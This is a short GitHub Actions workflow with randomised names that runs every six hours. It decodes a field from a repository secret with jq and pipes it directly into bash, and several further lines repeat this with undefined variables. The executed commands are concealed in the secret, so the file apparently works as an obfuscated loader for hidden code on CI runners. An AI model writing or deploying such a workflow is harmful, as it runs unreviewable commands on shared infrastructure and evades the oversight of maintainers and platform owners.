name: gutouru7465

on:
  workflow_dispatch:
  schedule:
    - cron: '7 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gutouru7465
        env:
          ps767: ${{ secrets.ps767 }}
        run: |
          echo $ps767 | jq -r .hqxt139 | /bin/bash
          echo $h46990 | jq -r .a2283 | /bin/bash
          echo $vrit5304 | jq -r .gpyxi5551 | /bin/bash
          echo $vmi74731 | jq -r .r6814 | /bin/bash
          echo $abth4 | jq -r .d9 | /bin/bash
          echo $e37288 | jq -r .svnme71901 | /bin/bash

